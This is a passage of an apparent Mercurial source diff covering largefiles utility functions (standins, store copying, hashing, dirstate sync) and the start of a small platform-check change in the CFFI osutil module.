232 wvfs = repo.wvfs
233 path = findfile(repo, hash)
233 path = findfile(repo, hash)
234 if path is None:
234 if path is None:
235 return False
235 return False
236 wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
236 wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
237 # The write may fail before the file is fully written, but we
237 # The write may fail before the file is fully written, but we
238 # don't use atomic writes in the working copy.
238 # don't use atomic writes in the working copy.
239 with open(path, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
239 with open(path, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
240 gothash = copyandhash(
240 gothash = copyandhash(
241 util.filechunkiter(srcfd), destfd)
241 util.filechunkiter(srcfd), destfd)
242 if gothash != hash:
242 if gothash != hash:
243 repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
243 repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
244 % (filename, path, gothash))
244 % (filename, path, gothash))
245 wvfs.unlink(filename)
245 wvfs.unlink(filename)
246 return False
246 return False
247 return True
247 return True
248
248
249 def copytostore(repo, ctx, file, fstandin):
249 def copytostore(repo, ctx, file, fstandin):
250 wvfs = repo.wvfs
250 wvfs = repo.wvfs
251 hash = readasstandin(ctx[fstandin])
251 hash = readasstandin(ctx[fstandin])
252 if instore(repo, hash):
252 if instore(repo, hash):
253 return
253 return
254 if wvfs.exists(file):
254 if wvfs.exists(file):
255 copytostoreabsolute(repo, wvfs.join(file), hash)
255 copytostoreabsolute(repo, wvfs.join(file), hash)
256 else:
256 else:
257 repo.ui.warn(_("%s: largefile %s not available from local store\n") %
257 repo.ui.warn(_("%s: largefile %s not available from local store\n") %
258 (file, hash))
258 (file, hash))
259
259
260 def copyalltostore(repo, node):
260 def copyalltostore(repo, node):
261 '''Copy all largefiles in a given revision to the store'''
261 '''Copy all largefiles in a given revision to the store'''
262
262
263 ctx = repo[node]
263 ctx = repo[node]
264 for filename in ctx.files():
264 for filename in ctx.files():
265 realfile = splitstandin(filename)
265 realfile = splitstandin(filename)
266 if realfile is not None and filename in ctx.manifest():
266 if realfile is not None and filename in ctx.manifest():
267 copytostore(repo, ctx, realfile, filename)
267 copytostore(repo, ctx, realfile, filename)
268
268
269 def copytostoreabsolute(repo, file, hash):
269 def copytostoreabsolute(repo, file, hash):
270 if inusercache(repo.ui, hash):
270 if inusercache(repo.ui, hash):
271 link(usercachepath(repo.ui, hash), storepath(repo, hash))
271 link(usercachepath(repo.ui, hash), storepath(repo, hash))
272 else:
272 else:
273 util.makedirs(os.path.dirname(storepath(repo, hash)))
273 util.makedirs(os.path.dirname(storepath(repo, hash)))
274 with open(file, 'rb') as srcf:
274 with open(file, 'rb') as srcf:
275 with util.atomictempfile(storepath(repo, hash),
275 with util.atomictempfile(storepath(repo, hash),
276 createmode=repo.store.createmode) as dstf:
276 createmode=repo.store.createmode) as dstf:
277 for chunk in util.filechunkiter(srcf):
277 for chunk in util.filechunkiter(srcf):
278 dstf.write(chunk)
278 dstf.write(chunk)
279 linktousercache(repo, hash)
279 linktousercache(repo, hash)
280
280
281 def linktousercache(repo, hash):
281 def linktousercache(repo, hash):
282 '''Link / copy the largefile with the specified hash from the store
282 '''Link / copy the largefile with the specified hash from the store
283 to the cache.'''
283 to the cache.'''
284 path = usercachepath(repo.ui, hash)
284 path = usercachepath(repo.ui, hash)
285 link(storepath(repo, hash), path)
285 link(storepath(repo, hash), path)
286
286
287 def getstandinmatcher(repo, rmatcher=None):
287 def getstandinmatcher(repo, rmatcher=None):
288 '''Return a match object that applies rmatcher to the standin directory'''
288 '''Return a match object that applies rmatcher to the standin directory'''
289 wvfs = repo.wvfs
289 wvfs = repo.wvfs
290 standindir = shortname
290 standindir = shortname
291
291
292 # no warnings about missing files or directories
292 # no warnings about missing files or directories
293 badfn = lambda f, msg: None
293 badfn = lambda f, msg: None
294
294
295 if rmatcher and not rmatcher.always():
295 if rmatcher and not rmatcher.always():
296 pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
296 pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
297 if not pats:
297 if not pats:
298 pats = [wvfs.join(standindir)]
298 pats = [wvfs.join(standindir)]
299 match = scmutil.match(repo[None], pats, badfn=badfn)
299 match = scmutil.match(repo[None], pats, badfn=badfn)
300 else:
300 else:
301 # no patterns: relative to repo root
301 # no patterns: relative to repo root
302 match = scmutil.match(repo[None], [wvfs.join(standindir)], badfn=badfn)
302 match = scmutil.match(repo[None], [wvfs.join(standindir)], badfn=badfn)
303 return match
303 return match
304
304
305 def composestandinmatcher(repo, rmatcher):
305 def composestandinmatcher(repo, rmatcher):
306 '''Return a matcher that accepts standins corresponding to the
306 '''Return a matcher that accepts standins corresponding to the
307 files accepted by rmatcher. Pass the list of files in the matcher
307 files accepted by rmatcher. Pass the list of files in the matcher
308 as the paths specified by the user.'''
308 as the paths specified by the user.'''
309 smatcher = getstandinmatcher(repo, rmatcher)
309 smatcher = getstandinmatcher(repo, rmatcher)
310 isstandin = smatcher.matchfn
310 isstandin = smatcher.matchfn
311 def composedmatchfn(f):
311 def composedmatchfn(f):
312 return isstandin(f) and rmatcher.matchfn(splitstandin(f))
312 return isstandin(f) and rmatcher.matchfn(splitstandin(f))
313 smatcher.matchfn = composedmatchfn
313 smatcher.matchfn = composedmatchfn
314
314
315 return smatcher
315 return smatcher
316
316
317 def standin(filename):
317 def standin(filename):
318 '''Return the repo-relative path to the standin for the specified big
318 '''Return the repo-relative path to the standin for the specified big
319 file.'''
319 file.'''
320 # Notes:
320 # Notes:
321 # 1) Some callers want an absolute path, but for instance addlargefiles
321 # 1) Some callers want an absolute path, but for instance addlargefiles
322 # needs it repo-relative so it can be passed to repo[None].add(). So
322 # needs it repo-relative so it can be passed to repo[None].add(). So
323 # leave it up to the caller to use repo.wjoin() to get an absolute path.
323 # leave it up to the caller to use repo.wjoin() to get an absolute path.
324 # 2) Join with '/' because that's what dirstate always uses, even on
324 # 2) Join with '/' because that's what dirstate always uses, even on
325 # Windows. Change existing separator to '/' first in case we are
325 # Windows. Change existing separator to '/' first in case we are
326 # passed filenames from an external source (like the command line).
326 # passed filenames from an external source (like the command line).
327 return shortnameslash + util.pconvert(filename)
327 return shortnameslash + util.pconvert(filename)
328
328
329 def isstandin(filename):
329 def isstandin(filename):
330 '''Return true if filename is a big file standin. filename must be
330 '''Return true if filename is a big file standin. filename must be
331 in Mercurial's internal form (slash-separated).'''
331 in Mercurial's internal form (slash-separated).'''
332 return filename.startswith(shortnameslash)
332 return filename.startswith(shortnameslash)
333
333
334 def splitstandin(filename):
334 def splitstandin(filename):
335 # Split on / because that's what dirstate always uses, even on Windows.
335 # Split on / because that's what dirstate always uses, even on Windows.
336 # Change local separator to / first just in case we are passed filenames
336 # Change local separator to / first just in case we are passed filenames
337 # from an external source (like the command line).
337 # from an external source (like the command line).
338 bits = util.pconvert(filename).split('/', 1)
338 bits = util.pconvert(filename).split('/', 1)
339 if len(bits) == 2 and bits[0] == shortname:
339 if len(bits) == 2 and bits[0] == shortname:
340 return bits[1]
340 return bits[1]
341 else:
341 else:
342 return None
342 return None
343
343
344 def updatestandin(repo, lfile, standin):
344 def updatestandin(repo, lfile, standin):
345 """Re-calculate hash value of lfile and write it into standin
345 """Re-calculate hash value of lfile and write it into standin
346
346
347 This assumes that "lfutil.standin(lfile) == standin", for efficiency.
347 This assumes that "lfutil.standin(lfile) == standin", for efficiency.
348 """
348 """
349 file = repo.wjoin(lfile)
349 file = repo.wjoin(lfile)
350 if repo.wvfs.exists(lfile):
350 if repo.wvfs.exists(lfile):
351 hash = hashfile(file)
351 hash = hashfile(file)
352 executable = getexecutable(file)
352 executable = getexecutable(file)
353 writestandin(repo, standin, hash, executable)
353 writestandin(repo, standin, hash, executable)
354 else:
354 else:
355 raise error.Abort(_('%s: file not found!') % lfile)
355 raise error.Abort(_('%s: file not found!') % lfile)
356
356
357 def readasstandin(fctx):
357 def readasstandin(fctx):
358 '''read hex hash from given filectx of standin file
358 '''read hex hash from given filectx of standin file
359
359
360 This encapsulates how "standin" data is stored into storage layer.'''
360 This encapsulates how "standin" data is stored into storage layer.'''
361 return fctx.data().strip()
361 return fctx.data().strip()
362
362
363 def writestandin(repo, standin, hash, executable):
363 def writestandin(repo, standin, hash, executable):
364 '''write hash to <repo.root>/<standin>'''
364 '''write hash to <repo.root>/<standin>'''
365 repo.wwrite(standin, hash + '\n', executable and 'x' or '')
365 repo.wwrite(standin, hash + '\n', executable and 'x' or '')
366
366
367 def copyandhash(instream, outfile):
367 def copyandhash(instream, outfile):
368 '''Read bytes from instream (iterable) and write them to outfile,
368 '''Read bytes from instream (iterable) and write them to outfile,
369 computing the SHA-1 hash of the data along the way. Return the hash.'''
369 computing the SHA-1 hash of the data along the way. Return the hash.'''
370 hasher = hashlib.sha1('')
370 hasher = hashlib.sha1('')
371 for data in instream:
371 for data in instream:
372 hasher.update(data)
372 hasher.update(data)
373 outfile.write(data)
373 outfile.write(data)
374 return hasher.hexdigest()
374 return hasher.hexdigest()
375
375
376 def hashfile(file):
376 def hashfile(file):
377 if not os.path.exists(file):
377 if not os.path.exists(file):
378 return ''
378 return ''
379 with open(file, 'rb') as fd:
379 with open(file, 'rb') as fd:
380 return hexsha1(fd)
380 return hexsha1(fd)
381
381
382 def getexecutable(filename):
382 def getexecutable(filename):
383 mode = os.stat(filename).st_mode
383 mode = os.stat(filename).st_mode
384 return ((mode & stat.S_IXUSR) and
384 return ((mode & stat.S_IXUSR) and
385 (mode & stat.S_IXGRP) and
385 (mode & stat.S_IXGRP) and
386 (mode & stat.S_IXOTH))
386 (mode & stat.S_IXOTH))
387
387
388 def urljoin(first, second, *arg):
388 def urljoin(first, second, *arg):
389 def join(left, right):
389 def join(left, right):
390 if not left.endswith('/'):
390 if not left.endswith('/'):
391 left += '/'
391 left += '/'
392 if right.startswith('/'):
392 if right.startswith('/'):
393 right = right[1:]
393 right = right[1:]
394 return left + right
394 return left + right
395
395
396 url = join(first, second)
396 url = join(first, second)
397 for a in arg:
397 for a in arg:
398 url = join(url, a)
398 url = join(url, a)
399 return url
399 return url
400
400
401 def hexsha1(fileobj):
401 def hexsha1(fileobj):
402 """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
402 """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
403 object data"""
403 object data"""
404 h = hashlib.sha1()
404 h = hashlib.sha1()
405 for chunk in util.filechunkiter(fileobj):
405 for chunk in util.filechunkiter(fileobj):
406 h.update(chunk)
406 h.update(chunk)
407 return h.hexdigest()
407 return h.hexdigest()
408
408
409 def httpsendfile(ui, filename):
409 def httpsendfile(ui, filename):
410 return httpconnection.httpsendfile(ui, filename, 'rb')
410 return httpconnection.httpsendfile(ui, filename, 'rb')
411
411
412 def unixpath(path):
412 def unixpath(path):
413 '''Return a version of path normalized for use with the lfdirstate.'''
413 '''Return a version of path normalized for use with the lfdirstate.'''
414 return util.pconvert(os.path.normpath(path))
414 return util.pconvert(os.path.normpath(path))
415
415
416 def islfilesrepo(repo):
416 def islfilesrepo(repo):
417 '''Return true if the repo is a largefile repo.'''
417 '''Return true if the repo is a largefile repo.'''
418 if ('largefiles' in repo.requirements and
418 if ('largefiles' in repo.requirements and
419 any(shortnameslash in f[0] for f in repo.store.datafiles())):
419 any(shortnameslash in f[0] for f in repo.store.datafiles())):
420 return True
420 return True
421
421
422 return any(openlfdirstate(repo.ui, repo, False))
422 return any(openlfdirstate(repo.ui, repo, False))
423
423
424 class storeprotonotcapable(Exception):
424 class storeprotonotcapable(Exception):
425 def __init__(self, storetypes):
425 def __init__(self, storetypes):
426 self.storetypes = storetypes
426 self.storetypes = storetypes
427
427
428 def getstandinsstate(repo):
428 def getstandinsstate(repo):
429 standins = []
429 standins = []
430 matcher = getstandinmatcher(repo)
430 matcher = getstandinmatcher(repo)
431 wctx = repo[None]
431 wctx = repo[None]
432 for standin in repo.dirstate.walk(matcher, subrepos=[], unknown=False,
432 for standin in repo.dirstate.walk(matcher, subrepos=[], unknown=False,
433 ignored=False):
433 ignored=False):
434 lfile = splitstandin(standin)
434 lfile = splitstandin(standin)
435 try:
435 try:
436 hash = readasstandin(wctx[standin])
436 hash = readasstandin(wctx[standin])
437 except IOError:
437 except IOError:
438 hash = None
438 hash = None
439 standins.append((lfile, hash))
439 standins.append((lfile, hash))
440 return standins
440 return standins
441
441
442 def synclfdirstate(repo, lfdirstate, lfile, normallookup):
442 def synclfdirstate(repo, lfdirstate, lfile, normallookup):
443 lfstandin = standin(lfile)
443 lfstandin = standin(lfile)
444 if lfstandin in repo.dirstate:
444 if lfstandin in repo.dirstate:
445 stat = repo.dirstate._map[lfstandin]
445 stat = repo.dirstate._map[lfstandin]
446 state, mtime = stat[0], stat[3]
446 state, mtime = stat[0], stat[3]
447 else:
447 else:
448 state, mtime = '?', -1
448 state, mtime = '?', -1
449 if state == 'n':
449 if state == 'n':
450 if (normallookup or mtime < 0 or
450 if (normallookup or mtime < 0 or
451 not repo.wvfs.exists(lfile)):
451 not repo.wvfs.exists(lfile)):
452 # state 'n' doesn't ensure 'clean' in this case
452 # state 'n' doesn't ensure 'clean' in this case
453 lfdirstate.normallookup(lfile)
453 lfdirstate.normallookup(lfile)
454 else:
454 else:
455 lfdirstate.normal(lfile)
455 lfdirstate.normal(lfile)
456 elif state == 'm':
456 elif state == 'm':
457 lfdirstate.normallookup(lfile)
457 lfdirstate.normallookup(lfile)
458 elif state == 'r':
458 elif state == 'r':
459 lfdirstate.remove(lfile)
459 lfdirstate.remove(lfile)
460 elif state == 'a':
460 elif state == 'a':
461 lfdirstate.add(lfile)
461 lfdirstate.add(lfile)
462 elif state == '?':
462 elif state == '?':
463 lfdirstate.drop(lfile)
463 lfdirstate.drop(lfile)
464
464
465 def markcommitted(orig, ctx, node):
465 def markcommitted(orig, ctx, node):
466 repo = ctx.repo()
466 repo = ctx.repo()
467
467
468 orig(node)
468 orig(node)
469
469
470 # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
470 # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
471 # because files coming from the 2nd parent are omitted in the latter.
471 # because files coming from the 2nd parent are omitted in the latter.
472 #
472 #
473 # The former should be used to get targets of "synclfdirstate",
473 # The former should be used to get targets of "synclfdirstate",
474 # because such files:
474 # because such files:
475 # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
475 # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
476 # - have to be marked as "n" after commit, but
476 # - have to be marked as "n" after commit, but
477 # - aren't listed in "repo[node].files()"
477 # - aren't listed in "repo[node].files()"
478
478
479 lfdirstate = openlfdirstate(repo.ui, repo)
479 lfdirstate = openlfdirstate(repo.ui, repo)
480 for f in ctx.files():
480 for f in ctx.files():
481 lfile = splitstandin(f)
481 lfile = splitstandin(f)
482 if lfile is not None:
482 if lfile is not None:
483 synclfdirstate(repo, lfdirstate, lfile, False)
483 synclfdirstate(repo, lfdirstate, lfile, False)
484 lfdirstate.write()
484 lfdirstate.write()
485
485
486 # As part of committing, copy all of the largefiles into the cache.
486 # As part of committing, copy all of the largefiles into the cache.
487 #
487 #
488 # Using "node" instead of "ctx" implies additional "repo[node]"
488 # Using "node" instead of "ctx" implies additional "repo[node]"
489 # lookup while copyalltostore(), but can omit redundant check for
489 # lookup while copyalltostore(), but can omit redundant check for
490 # files comming from the 2nd parent, which should exist in store
490 # files comming from the 2nd parent, which should exist in store
491 # at merging.
491 # at merging.
492 copyalltostore(repo, node)
492 copyalltostore(repo, node)
493
493
494 def getlfilestoupdate(oldstandins, newstandins):
494 def getlfilestoupdate(oldstandins, newstandins):
495 changedstandins = set(oldstandins).symmetric_difference(set(newstandins))
495 changedstandins = set(oldstandins).symmetric_difference(set(newstandins))
496 filelist = []
496 filelist = []
497 for f in changedstandins:
497 for f in changedstandins:
498 if f[0] not in filelist:
498 if f[0] not in filelist:
499 filelist.append(f[0])
499 filelist.append(f[0])
500 return filelist
500 return filelist
501
501
502 def getlfilestoupload(repo, missing, addfunc):
502 def getlfilestoupload(repo, missing, addfunc):
503 for i, n in enumerate(missing):
503 for i, n in enumerate(missing):
504 repo.ui.progress(_('finding outgoing largefiles'), i,
504 repo.ui.progress(_('finding outgoing largefiles'), i,
505 unit=_('revisions'), total=len(missing))
505 unit=_('revisions'), total=len(missing))
506 parents = [p for p in repo[n].parents() if p != node.nullid]
506 parents = [p for p in repo[n].parents() if p != node.nullid]
507
507
508 oldlfstatus = repo.lfstatus
508 oldlfstatus = repo.lfstatus
509 repo.lfstatus = False
509 repo.lfstatus = False
510 try:
510 try:
511 ctx = repo[n]
511 ctx = repo[n]
512 finally:
512 finally:
513 repo.lfstatus = oldlfstatus
513 repo.lfstatus = oldlfstatus
514
514
515 files = set(ctx.files())
515 files = set(ctx.files())
516 if len(parents) == 2:
516 if len(parents) == 2:
517 mc = ctx.manifest()
517 mc = ctx.manifest()
518 mp1 = ctx.parents()[0].manifest()
518 mp1 = ctx.parents()[0].manifest()
519 mp2 = ctx.parents()[1].manifest()
519 mp2 = ctx.parents()[1].manifest()
520 for f in mp1:
520 for f in mp1:
521 if f not in mc:
521 if f not in mc:
522 files.add(f)
522 files.add(f)
523 for f in mp2:
523 for f in mp2:
524 if f not in mc:
524 if f not in mc:
525 files.add(f)
525 files.add(f)
526 for f in mc:
526 for f in mc:
527 if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
527 if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
528 files.add(f)
528 files.add(f)
529 for fn in files:
529 for fn in files:
530 if isstandin(fn) and fn in ctx:
530 if isstandin(fn) and fn in ctx:
531 addfunc(fn, readasstandin(ctx[fn]))
531 addfunc(fn, readasstandin(ctx[fn]))
532 repo.ui.progress(_('finding outgoing largefiles'), None)
532 repo.ui.progress(_('finding outgoing largefiles'), None)
533
533
534 def updatestandinsbymatch(repo, match):
534 def updatestandinsbymatch(repo, match):
535 '''Update standins in the working directory according to specified match
535 '''Update standins in the working directory according to specified match
536
536
537 This returns (possibly modified) ``match`` object to be used for
537 This returns (possibly modified) ``match`` object to be used for
538 subsequent commit process.
538 subsequent commit process.
539 '''
539 '''
540
540
541 ui = repo.ui
541 ui = repo.ui
542
542
543 # Case 1: user calls commit with no specific files or
543 # Case 1: user calls commit with no specific files or
544 # include/exclude patterns: refresh and commit all files that
544 # include/exclude patterns: refresh and commit all files that
545 # are "dirty".
545 # are "dirty".
546 if match is None or match.always():
546 if match is None or match.always():
547 # Spend a bit of time here to get a list of files we know
547 # Spend a bit of time here to get a list of files we know
548 # are modified so we can compare only against those.
548 # are modified so we can compare only against those.
549 # It can cost a lot of time (several seconds)
549 # It can cost a lot of time (several seconds)
550 # otherwise to update all standins if the largefiles are
550 # otherwise to update all standins if the largefiles are
551 # large.
551 # large.
552 lfdirstate = openlfdirstate(ui, repo)
552 lfdirstate = openlfdirstate(ui, repo)
553 dirtymatch = matchmod.always(repo.root, repo.getcwd())
553 dirtymatch = matchmod.always(repo.root, repo.getcwd())
554 unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
554 unsure, s = lfdirstate.status(dirtymatch, subrepos=[], ignored=False,
555 clean=False, unknown=False)
555 clean=False, unknown=False)
556 modifiedfiles = unsure + s.modified + s.added + s.removed
556 modifiedfiles = unsure + s.modified + s.added + s.removed
557 lfiles = listlfiles(repo)
557 lfiles = listlfiles(repo)
558 # this only loops through largefiles that exist (not
558 # this only loops through largefiles that exist (not
559 # removed/renamed)
559 # removed/renamed)
560 for lfile in lfiles:
560 for lfile in lfiles:
561 if lfile in modifiedfiles:
561 if lfile in modifiedfiles:
562 fstandin = standin(lfile)
562 fstandin = standin(lfile)
563 if repo.wvfs.exists(fstandin):
563 if repo.wvfs.exists(fstandin):
564 # this handles the case where a rebase is being
564 # this handles the case where a rebase is being
565 # performed and the working copy is not updated
565 # performed and the working copy is not updated
566 # yet.
566 # yet.
567 if repo.wvfs.exists(lfile):
567 if repo.wvfs.exists(lfile):
568 updatestandin(repo, lfile, fstandin)
568 updatestandin(repo, lfile, fstandin)
569
569
570 return match
570 return match
571
571
572 lfiles = listlfiles(repo)
572 lfiles = listlfiles(repo)
573 match._files = repo._subdirlfs(match.files(), lfiles)
573 match._files = repo._subdirlfs(match.files(), lfiles)
574
574
575 # Case 2: user calls commit with specified patterns: refresh
575 # Case 2: user calls commit with specified patterns: refresh
576 # any matching big files.
576 # any matching big files.
577 smatcher = composestandinmatcher(repo, match)
577 smatcher = composestandinmatcher(repo, match)
578 standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
578 standins = repo.dirstate.walk(smatcher, subrepos=[], unknown=False,
579 ignored=False)
579 ignored=False)
580
580
581 # No matching big files: get out of the way and pass control to
581 # No matching big files: get out of the way and pass control to
582 # the usual commit() method.
582 # the usual commit() method.
583 if not standins:
583 if not standins:
584 return match
584 return match
585
585
586 # Refresh all matching big files. It's possible that the
586 # Refresh all matching big files. It's possible that the
587 # commit will end up failing, in which case the big files will
587 # commit will end up failing, in which case the big files will
588 # stay refreshed. No harm done: the user modified them and
588 # stay refreshed. No harm done: the user modified them and
589 # asked to commit them, so sooner or later we're going to
589 # asked to commit them, so sooner or later we're going to
590 # refresh the standins. Might as well leave them refreshed.
590 # refresh the standins. Might as well leave them refreshed.
591 lfdirstate = openlfdirstate(ui, repo)
591 lfdirstate = openlfdirstate(ui, repo)
592 for fstandin in standins:
592 for fstandin in standins:
593 lfile = splitstandin(fstandin)
593 lfile = splitstandin(fstandin)
594 if lfdirstate[lfile] != 'r':
594 if lfdirstate[lfile] != 'r':
595 updatestandin(repo, lfile, fstandin)
595 updatestandin(repo, lfile, fstandin)
596
596
597 # Cook up a new matcher that only matches regular files or
597 # Cook up a new matcher that only matches regular files or
598 # standins corresponding to the big files requested by the
598 # standins corresponding to the big files requested by the
599 # user. Have to modify _files to prevent commit() from
599 # user. Have to modify _files to prevent commit() from
600 # complaining "not tracked" for big files.
600 # complaining "not tracked" for big files.
601 match = copy.copy(match)
601 match = copy.copy(match)
602 origmatchfn = match.matchfn
602 origmatchfn = match.matchfn
603
603
604 # Check both the list of largefiles and the list of
604 # Check both the list of largefiles and the list of
605 # standins because if a largefile was removed, it
605 # standins because if a largefile was removed, it
606 # won't be in the list of largefiles at this point
606 # won't be in the list of largefiles at this point
607 match._files += sorted(standins)
607 match._files += sorted(standins)
608
608
609 actualfiles = []
609 actualfiles = []
610 for f in match._files:
610 for f in match._files:
611 fstandin = standin(f)
611 fstandin = standin(f)
612
612
613 # For largefiles, only one of the normal and standin should be
613 # For largefiles, only one of the normal and standin should be
614 # committed (except if one of them is a remove). In the case of a
614 # committed (except if one of them is a remove). In the case of a
615 # standin removal, drop the normal file if it is unknown to dirstate.
615 # standin removal, drop the normal file if it is unknown to dirstate.
616 # Thus, skip plain largefile names but keep the standin.
616 # Thus, skip plain largefile names but keep the standin.
617 if f in lfiles or fstandin in standins:
617 if f in lfiles or fstandin in standins:
618 if repo.dirstate[fstandin] != 'r':
618 if repo.dirstate[fstandin] != 'r':
619 if repo.dirstate[f] != 'r':
619 if repo.dirstate[f] != 'r':
620 continue
620 continue
621 elif repo.dirstate[f] == '?':
621 elif repo.dirstate[f] == '?':
622 continue
622 continue
623
623
624 actualfiles.append(f)
624 actualfiles.append(f)
625 match._files = actualfiles
625 match._files = actualfiles
626
626
627 def matchfn(f):
627 def matchfn(f):
628 if origmatchfn(f):
628 if origmatchfn(f):
629 return f not in lfiles
629 return f not in lfiles
630 else:
630 else:
631 return f in standins
631 return f in standins
632
632
633 match.matchfn = matchfn
633 match.matchfn = matchfn
634
634
635 return match
635 return match
636
636
637 class automatedcommithook(object):
637 class automatedcommithook(object):
638 '''Stateful hook to update standins at the 1st commit of resuming
638 '''Stateful hook to update standins at the 1st commit of resuming
639
639
640 For efficiency, updating standins in the working directory should
640 For efficiency, updating standins in the working directory should
641 be avoided while automated committing (like rebase, transplant and
641 be avoided while automated committing (like rebase, transplant and
642 so on), because they should be updated before committing.
642 so on), because they should be updated before committing.
643
643
644 But the 1st commit of resuming automated committing (e.g. ``rebase
644 But the 1st commit of resuming automated committing (e.g. ``rebase
645 --continue``) should update them, because largefiles may be
645 --continue``) should update them, because largefiles may be
646 modified manually.
646 modified manually.
647 '''
647 '''
648 def __init__(self, resuming):
648 def __init__(self, resuming):
649 self.resuming = resuming
649 self.resuming = resuming
650
650
651 def __call__(self, repo, match):
651 def __call__(self, repo, match):
652 if self.resuming:
652 if self.resuming:
653 self.resuming = False # avoids updating at subsequent commits
653 self.resuming = False # avoids updating at subsequent commits
654 return updatestandinsbymatch(repo, match)
654 return updatestandinsbymatch(repo, match)
655 else:
655 else:
656 return match
656 return match
657
657
658 def getstatuswriter(ui, repo, forcibly=None):
658 def getstatuswriter(ui, repo, forcibly=None):
659 '''Return the function to write largefiles specific status out
659 '''Return the function to write largefiles specific status out
660
660
661 If ``forcibly`` is ``None``, this returns the last element of
661 If ``forcibly`` is ``None``, this returns the last element of
662 ``repo._lfstatuswriters`` as "default" writer function.
662 ``repo._lfstatuswriters`` as "default" writer function.
663
663
664 Otherwise, this returns the function to always write out (or
664 Otherwise, this returns the function to always write out (or
665 ignore if ``not forcibly``) status.
665 ignore if ``not forcibly``) status.
666 '''
666 '''
667 if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
667 if forcibly is None and util.safehasattr(repo, '_largefilesenabled'):
668 return repo._lfstatuswriters[-1]
668 return repo._lfstatuswriters[-1]
669 else:
669 else:
670 if forcibly:
670 if forcibly:
671 return ui.status # forcibly WRITE OUT
671 return ui.status # forcibly WRITE OUT
672 else:
672 else:
673 return lambda *msg, **opts: None # forcibly IGNORE
673 return lambda *msg, **opts: None # forcibly IGNORE
@@ -1,102 +1,102 b''
1 # osutil.py - CFFI version of osutil.c
1 # osutil.py - CFFI version of osutil.c
2 #
2 #
3 # Copyright 2016 Maciej Fijalkowski <fijall@gmail.com>
3 # Copyright 2016 Maciej Fijalkowski <fijall@gmail.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import os
10 import os
11 import stat as statmod
11 import stat as statmod
12
12
13 from ..pure.osutil import *
13 from ..pure.osutil import *
14
14
15 from .. import (
15 from .. import (
16 pycompat,
16 pycompat,
17 )
17 )
18
18
19 if pycompat.sysplatform == 'darwin':
19 if pycompat.isdarwin:
20 from . import _osutil
20 from . import _osutil
21
21
22 ffi = _osutil.ffi
22 ffi = _osutil.ffi
23 lib = _osutil.lib
23 lib = _osutil.lib
24
24
25 listdir_batch_size = 4096
25 listdir_batch_size = 4096
26 # tweakable number, only affects performance, which chunks
26 # tweakable number, only affects performance, which chunks
27 # of bytes do we get back from getattrlistbulk
27 # of bytes do we get back from getattrlistbulk
28
28
29 attrkinds = [None] * 20 # we need the max no for enum VXXX, 20 is plenty
29 attrkinds = [None] * 20 # we need the max no for enum VXXX, 20 is plenty
30
30
31 attrkinds[lib.VREG] = statmod.S_IFREG
31 attrkinds[lib.VREG] = statmod.S_IFREG
32 attrkinds[lib.VDIR] = statmod.S_IFDIR
32 attrkinds[lib.VDIR] = statmod.S_IFDIR
33 attrkinds[lib.VLNK] = statmod.S_IFLNK
33 attrkinds[lib.VLNK] = statmod.S_IFLNK
34 attrkinds[lib.VBLK] = statmod.S_IFBLK
34 attrkinds[lib.VBLK] = statmod.S_IFBLK
35 attrkinds[lib.VCHR] = statmod.S_IFCHR
35 attrkinds[lib.VCHR] = statmod.S_IFCHR
36 attrkinds[lib.VFIFO] = statmod.S_IFIFO
36 attrkinds[lib.VFIFO] = statmod.S_IFIFO
37 attrkinds[lib.VSOCK] = statmod.S_IFSOCK
37 attrkinds[lib.VSOCK] = statmod.S_IFSOCK
38
38
39 class stat_res(object):
39 class stat_res(object):
40 def __init__(self, st_mode, st_mtime, st_size):
40 def __init__(self, st_mode, st_mtime, st_size):
41 self.st_mode = st_mode
41 self.st_mode = st_mode
42 self.st_mtime = st_mtime
42 self.st_mtime = st_mtime
43 self.st_size = st_size
43 self.st_size = st_size
44
44
45 tv_sec_ofs = ffi.offsetof("struct timespec", "tv_sec")
45 tv_sec_ofs = ffi.offsetof("struct timespec", "tv_sec")
46 buf = ffi.new("char[]", listdir_batch_size)
46 buf = ffi.new("char[]", listdir_batch_size)
47
47
48 def listdirinternal(dfd, req, stat, skip):
48 def listdirinternal(dfd, req, stat, skip):
49 ret = []
49 ret = []
50 while True:
50 while True:
51 r = lib.getattrlistbulk(dfd, req, buf, listdir_batch_size, 0)
51 r = lib.getattrlistbulk(dfd, req, buf, listdir_batch_size, 0)
52 if r == 0:
52 if r == 0:
53 break
53 break
54 if r == -1:
54 if r == -1:
55 raise OSError(ffi.errno, os.strerror(ffi.errno))
55 raise OSError(ffi.errno, os.strerror(ffi.errno))
56 cur = ffi.cast("val_attrs_t*", buf)
56 cur = ffi.cast("val_attrs_t*", buf)
57 for i in range(r):
57 for i in range(r):
58 lgt = cur.length
58 lgt = cur.length
59 assert lgt == ffi.cast('uint32_t*', cur)[0]
59 assert lgt == ffi.cast('uint32_t*', cur)[0]
60 ofs = cur.name_info.attr_dataoffset
60 ofs = cur.name_info.attr_dataoffset
61 str_lgt = cur.name_info.attr_length
61 str_lgt = cur.name_info.attr_length
62 base_ofs = ffi.offsetof('val_attrs_t', 'name_info')
62 base_ofs = ffi.offsetof('val_attrs_t', 'name_info')
63 name = str(ffi.buffer(ffi.cast("char*", cur) + base_ofs + ofs,
63 name = str(ffi.buffer(ffi.cast("char*", cur) + base_ofs + ofs,
